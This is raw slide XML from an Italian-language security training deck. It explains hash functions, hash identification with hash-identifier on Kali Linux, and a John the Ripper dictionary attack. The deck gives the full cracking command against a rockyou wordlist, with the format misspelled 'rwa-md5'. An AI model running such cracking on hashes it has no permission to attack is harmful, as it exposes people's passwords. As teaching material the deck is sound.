              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>è il risultato di una funzione di hash, che è un algoritmo matematico utilizzato per trasformare un input (o "messaggio") di qualsiasi dimensione in un output di dimensione fissa, solitamente rappresentato come una stringa di caratteri esadecimali. Questo output è chiamato "valore hash" o "digest".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Gli hash sono utilizzati in vari contesti, tra cui:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="438279" indent="-219140" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Sicurezza informatica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>: Per memorizzare in modo sicuro le password. Invece di memorizzare la password in chiaro, si memorizza il suo hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="438279" indent="-219140" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Integrità dei dati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>: Per verificare che i dati non siano stati alterati. Gli hash possono essere usati per controllare l'integrità dei file o dei messaggi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="438279" indent="-219140" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Firma digitale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>: Parte del processo di creazione e verifica delle firme digitali, che assicurano l'autenticità e l'integrità dei messaggi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="438279" indent="-219140" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>Tabelle hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>: Strutture dati che utilizzano funzioni di hash per una ricerca rapida di dati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Esempi comuni di funzioni di hash includono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>SHA-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>SHA-256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>SHA-256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2030">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> particolarmente usato per la sua sicurezza e robustezza rispetto a collisioni e attacchi di preimage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2842"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 18" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="15460564" y="8031946"/>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Freeform 20" id="20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10956179" y="1642892"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573839" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573839" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>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446886" y="-308610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800000">
            <a:off x="3771284" y="5143500"/>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4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="11134744" y="-2575651"/>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5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-4738396" y="7588140"/>
            <a:ext cx="7736552" cy="7407749"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7407749" w="7736552">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7736552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7736552" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7407748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-4295188" y="-2575651"/>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7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="13553923" y="-123594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0">
            <a:off x="8973662" y="4428961"/>
            <a:ext cx="8877702" cy="4614161"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4614161" w="8877702">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8877702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8877702" y="4614162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4614162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="388695"/>
            <a:ext cx="14768151" cy="1217315"/>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4.2 - STUDIO DELL’HASH E IDENTIFICAZIONE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 10" id="10"/>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11" id="11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="788726" y="-127800"/>
            <a:ext cx="5087918" cy="10067321"/>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257" t="0" r="-22257" b="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1" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5781023" y="6523960"/>
            <a:ext cx="2963959" cy="1891545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1891545" w="2963959">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2963958" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2963958" y="1891545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="189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1927286" y="953302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3" id="23"/>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24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="279565" y="2688712"/>
            <a:ext cx="6983437" cy="4761108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3751"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Kali Linux ha il programma Hash Identifier già preinstallato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3751"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Con la riga di comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>hash-identifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, il programma viene lanciato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3751"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3751"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Inserendo la stringa hash che si vuole analizzare, il tool restituisce i possibili tipi di hash a cui la stringa può appartenere. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3751"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>In questo caso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>MD4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2679">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3751"/>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1134744" y="-2575651"/>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5400000">
            <a:off x="-2046036" y="-3115561"/>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10800000">
            <a:off x="3969638" y="4666830"/>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5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-3060881" y="9440941"/>
            <a:ext cx="7736552" cy="7407749"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7407749" w="7736552">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7736552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7736552" y="7407749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7407749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="-3966503" y="-3368396"/>
            <a:ext cx="9990407" cy="9266102"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9266102" w="9990407">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9990406" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9990406" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9266102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="13408263" y="63235"/>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TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="527330"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9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1361797"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4.3 - JOHN THE RIPPER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 10" id="10"/>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11" id="11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="467524" y="-739762"/>
            <a:ext cx="8679178" cy="12026994"/>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TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="213875" y="1375551"/>
            <a:ext cx="7992690" cy="7794634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>John the Ripper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> è un popolare strumento di cracking delle password open-source, utilizzato principalmente per identificare password deboli e verificarne la sicurezza. Può utilizzare tecniche di attacco come il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t> brute force</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>l’attacco a  dizionario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> e molte altre per decifrare le password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>In questo caso specifico, viene utilizzato un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>attacco a dizionario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> per decifrare l’hash della password e renderla disponibile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>in chiaro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>L’attacco a dizionario prevede l’utilizzo di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>elenchi di parole comuni, frasi o combinazioni di caratteri frequentemente utilizzati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t> da usare per il confronto con la password da crackare. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="TT Autonomous Mono Bold"/>
              </a:rPr>
              <a:t>john --wordlist=/usr/share/wordlists/rockyou.txt --format=rwa-md5 ./Desktop/pablo.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="458708" indent="-229354" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>john: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>attiva il tool john the ripper</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="458708" indent="-229354" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>--wordlist=: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>specifica il path e il file della lista da utilizzare come base per il craking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="458708" indent="-229354" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo Bold"/>
              </a:rPr>
              <a:t>--format=: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>specifica il tipo di hash della password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="458708" indent="-229354" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2974"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2124">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
              </a:rPr>
              <a:t>Infine si aggiunge il file di testo dove è salvata la password da crackare.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8206565" y="3761890"/>
            <a:ext cx="9883591" cy="2763219"/>
